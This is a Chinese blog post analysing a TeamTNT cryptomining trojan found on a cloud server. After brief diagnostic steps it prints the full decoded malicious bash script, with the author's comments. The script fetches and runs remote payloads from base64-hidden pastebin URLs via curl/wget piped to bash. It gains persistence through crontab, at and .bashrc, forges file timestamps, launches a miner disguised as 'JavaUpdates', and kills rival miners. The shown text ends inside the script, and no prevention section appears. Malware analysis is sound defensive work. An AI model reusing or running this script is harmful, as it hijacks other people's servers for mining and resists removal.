分析teamTNT团队Linux挖矿木马执行过程与防范

hubaoquan · 发表于 2020-10-14 08:59

分析teamTNT团队Linux挖矿木马执行过程与防范

公司需要扩展海外业务，需要有一台海外云服务器。当我们把应用部署上去时的第二天所有应用down掉了，然后发现ssh连接服务器特别慢。好不容易连接上了执行一下free -h 发现内存占用99%,反手一个top，等了大约2分钟出来结果。

问题排查

查看当前内存：free -h 发现内存占用几乎达到98%。

查看当前进程：top等了大约2分钟出来结果。竟然有7000多个tasks,load average: 459.78, 584.52, 387.07，这明显很不正常。

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
5014 root      20   0 2902048   8396    840 S 330.7  0.1  16:39.43 JavaUpdates
9703 root      20   0  592780  38668   9256 R  15.2  0.5   0:00.93 yum 
9713 root      20   0  354280  25028   8268 S  15.2  0.3   0:00.46 yum
7606 root      20   0   10.0g    968    812 S   9.9  0.0   0:03.78 pnscan
7515 root      20   0   10.0g    968    812 S   9.6  0.0   0:02.08 pnscan
601 root      20   0   90568   3152   2284 S   1.7  0.0   7:28.37 rngd

发现有一个进程特别耗CPU：JavaUpdates

用ps aux | grep 'JavaUpdates' 查一下这个进程，没有发现执行程序路径。

 [gree@greepd ~]$ ps aux | grep 'JavaUpdates'
 root      5014  184  0.1 2902048 8396 ?        Ssl  01:39  52:39 ./JavaUpdates

用ps lax 或 ps lax | grep 'JavaUpdates'(注：命令结果只展示关键内容) 我们可以发现有个进程特别可疑。会去https://pastebin.com/raw/1eDKHr4r下载东西并执行,那我们顺腾摸瓜看看到底下载了什么。

[gree@greepd ~]$ ps lax
F   UID   PID  PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
5     0  1636   634  20   0 220544  3632 pipe_w S    ?          0:00 /usr/sbin/CROND -n
0     0  1649  1636  20   0 113284  1200 do_wai Ss   ?          0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/1eDKHr4r||wget -q -O- https://pastebin.com/raw/1eDKHr4r
5     0  5014     1  20   0 2902048 8396 ep_pol Ssl  ?         55:29 ./JavaUpdates

木马脚本分析

首先看看访问的这个https://pastebin.com/raw/1eDKHr4r链接有什么

(curl -fsSL https://pastebin.com/raw/UhUmR517||wget -q -O - https://pastebin.com/raw/UhUmR517||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/UhUmR517").read()')|base64 -d|bash

发现又去https://pastebin.com/raw/UhUmR517下载东西并执行，这个文本是base64编码的。怕源链接失效，大家可以去这里下载我上传的链接内容：https://documents.hubaoquan.cn/UhUmR517.txt

解码之后是如下脚本，里边#号后边是我的注释

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) #decode-->https://pastebin.com/raw/1eDKHr4r # https://documents.hubaoquan.cn/1eDKHr4r.txt
park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d)  #decode-->https://pastebin.com/raw/b5x1pRzK # https://documents.hubaoquan.cn/b5x1pRzK.txt
beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d)                  #decode-->sadan666.xyz:9080/rr   #404
deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d)  #decode-->https://pastebin.com/raw/SjjWevTs # dragon
surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d)  #decode-->https://pastebin.com/raw/tyjnTQTA # lossl
me=$( whoami )
function getarch() {
    ver="x86_64"
    arch=$(uname -m)
    arch2=$(uname -i)
    arch3=$(getconf LONG_BIT)
    if [ "$arch" == "x86_64" ]; then
        ver="x86_64"
    elif [ "$arch" == "i686" ]; then
        ver="i686"
    elif [ "$arch2" == "x86_64" ]; then
        ver="x86_64"
    elif [ "$arch2" == "i386" ]; then
        ver="i686"
    elif [ "$arch3" == "64" ]; then
        ver="x86_64"
    else
        ver="x86_64"
    fi
    echo $ver
}

ARCH=$(getarch)

function system() {
chattr -i /etc/crontab 
rm -rf /bin/httpntp /bin/ftpsdns 
sed -i '/httpntp/d' /etc/crontab 
sed -i '/ftpsdns/d' /etc/crontab 
echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp  
chmod 755 /bin/httpntp 
if [ ! -f "/etc/crontab" ]; then 
echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab 
else 
echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab 
fi 
echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/ftpsdns  
chmod 755 /bin/ftpsdns 
if [ ! -f "/etc/crontab" ]; then 
echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab 
else 
echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab 
fi 
touch -acmr /bin/sh /etc/crontab 
}

function cronhigh() {
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root 
rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 
mkdir -p /var/spool/cron/crontabs 
mkdir -p /etc/cron.hourly 
mkdir -p /etc/cron.daily 
mkdir -p /etc/cron.monthly 
sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root 
sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache 
sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system 
sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root 
sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root 
key=$( (curl -fsSL $house||wget -q -O - $house) ) 
echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root 
echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system 
echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache 
echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root 
echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root 
if [ ! -f "/etc/cron.hourly/oanacroane" ]; then 
echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane 
fi 
if [ ! -f "/etc/cron.daily/oanacroane" ]; then 
echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane 
fi 
if [ ! -f "/etc/cron.monthly/oanacroane" ]; then 
echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane 
fi 
touch -acmr /bin/sh /var/spool/cron/root 
touch -acmr /bin/sh /var/spool/cron/crontabs/root 
touch -acmr /bin/sh /etc/cron.d/system 
touch -acmr /bin/sh /etc/cron.d/apache 
touch -acmr /bin/sh /etc/cron.d/root 
touch -acmr /bin/sh /etc/cron.hourly/oanacroane 
touch -acmr /bin/sh /etc/cron.daily/oanacroane 
touch -acmr /bin/sh /etc/cron.monthly/oanacroane 
}

function cronlow() {
    cr=$(crontab -l | grep "$house" | wc -l)
    if [ ${cr} -eq 0 ];then
        crontab -r
        (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab -
    else
        echo " "
    fi
}

function cronbackup() {
    pay="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
    status=0
    crona=$(systemctl is-active cron)
    cronb=$(systemctl is-active crond)
    cronatd=$(systemctl is-active atd)
    if [ "$crona" == "active" ] ; then
        status=0
    elif [ "$cronb" == "active"  ]; then
        status=0
    elif [ "$cronatd" == "active" ] ; then
        status=1
    else
        status=2
    fi
    if [ $status -eq 1 ] ; then
        for a in $(at -l|awk '{print $1}'); do at -r $a; done
        echo "$pay" | at -m now + 1 minute
    fi
    if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
        amiup=$(ps -fe|grep 'crun'|grep -v grep|wc -l)
        if [ ${amiup} -ne 0 ] ; then
            ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9
        fi
        key="while true; do sleep 600 && $pay; done"
        echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/
        nohup ./crun >/dev/null 2>&1 &
        sleep 15
        rm /tmp/crun
    fi
}

function cronrc() {
    if [ "$me" != "root" ];then
        cron_rc_path="/home/$me/.bashrc"
        pay_rc="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
    else
        cron_rc_path="/root/.bashrc"
        pay_rc="sed -i '/pastebin.com/d' /etc/hosts;(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
    fi
    if [ -f "$cron_rc_path" ]; then
        sed -i '/pastebin.com/d' $cron_rc_path
        sed -i '/loaded_JavaUpdates_rc/d' $cron_rc_path
        echo -e "$pay_rc\n##loaded_JavaUpdates_rc" >> $cron_rc_path
    fi
}

function gettarfile() {
    temp_path="/tmp/.tmpdropoff"
    build_string="/tmp/.tmpdropoff/JavaUpdates"
    if [ "$3" == "-xzf" ];then
        tar_out="/tmp/.tmpdropoff/wwe"
        rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-notls"
    else
        tar_out="/tmp/.tmpdropoff/wwe"
        rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak"
    fi
    mkdir -p $temp_path/dataoutput/
    cd $temp_path
    (curl -fsSL $2 -o $tar_out||wget -q $2 -O $tar_out)
    base64 -d $tar_out >$build_string
    mv $build_string $3
    cd $1
    rm -rf $temp_path
}

function download() {
    pa=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
    if [ ${pa} -eq 0 ];then
        mi_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0dNZGVXcWVjCg==|base64 -d) # https://pastebin.com/raw/GMdeWqec # https://documents.hubaoquan.cn/GMdeWqec.txt
        der_ke=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2RYRDJCczBICg==|base64 -d)# https://pastebin.com/raw/dXD2Bs0H #404
        if [ "$me" != "root" ]; then
            path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
            if [ -d "$path" ]; then
                rm -rf $path/*
            else
                mkdir -p $path
            fi
        else
            path="/bin"
            rm -rf $path/config.json $path/JavaUpdates
        fi
        cd $path
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "$path/JavaUpdates" ]; then
                gettarfile "$path" "$mi_64" "$path/JavaUpdates"
                chmod 777 $path/JavaUpdates
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            else
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            fi
        elif [ "$ARCH" == "i686" ]; then
            # if [ ! -f "$path/JavaUpdates" ]; then
                # getencodedfile "$mi_32" "$path/JavaUpdates"
                # chmod 777 $path/JavaUpdates
                # nohup ./JavaUpdates >/dev/null 2>&1 &
            # else
                # nohup ./JavaUpdates >/dev/null 2>&1 &
            # fi
            echo ""
        else
            if [ ! -f "$path/JavaUpdates" ]; then
                gettarfile "$path" "$mi_64" "$path/JavaUpdates"
                chmod 777 $path/JavaUpdates
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            else
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            fi
        fi
    fi
}

function testa() {
    pb=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
    if [ ${pb} -eq 0 ];then
        st_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VzY3RmZ3J4Cg==|base64 -d) #https://pastebin.com/raw/Esctfgrx   # https://documents.hubaoquan.cn/Esctfgrx.txt
        con_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1prejBkOUp6Cg==|base64 -d)#https://pastebin.com/raw/Zkz0d9Jz  # https://documents.hubaoquan.cn/Zkz0d9Jz.txt
        cpu_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L212U0VHbVI2Cg==|base64 -d)#https://pastebin.com/raw/mvSEGmR6  # https://documents.hubaoquan.cn/mvSEGmR6.txt
        poo_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NCMFRZQnZHCg==|base64 -d)#https://pastebin.com/raw/SB0TYBvG  # https://documents.hubaoquan.cn/SB0TYBvG.txt
        if [ "$me" != "root" ]; then
            path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
            if [ -d "$path" ]; then
                rm -rf $path/*
            else
                mkdir -p $path
            fi
        else
            path="/bin"
            rm -rf $path/config.json $path/JavaUpdates $path/config.txt $path/cpu.txt $path/pools.txt
        fi
        cd $path
        if [ "$ARCH" == "x86_64" ]; then
            if [ ! -f "$path/JavaUpdates" ]; then
                gettarfile "$path" "$st_64" "$path/JavaUpdates"
                chmod 777 $path/JavaUpdates
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            else
                nohup ./JavaUpdates >/dev/null 2>&1 &
                sleep 15
                rm -rf $path/JavaUpdates
            fi
        else
            rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
        fi
    fi
}

function finished() {
    (curl -fsSL $1 || wget -q -O - $1) && touch /tmp/.tmpc
}

#****注意这个函数 有可能结束掉挖矿进程删除木马
kill_miner_proc()
{
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %
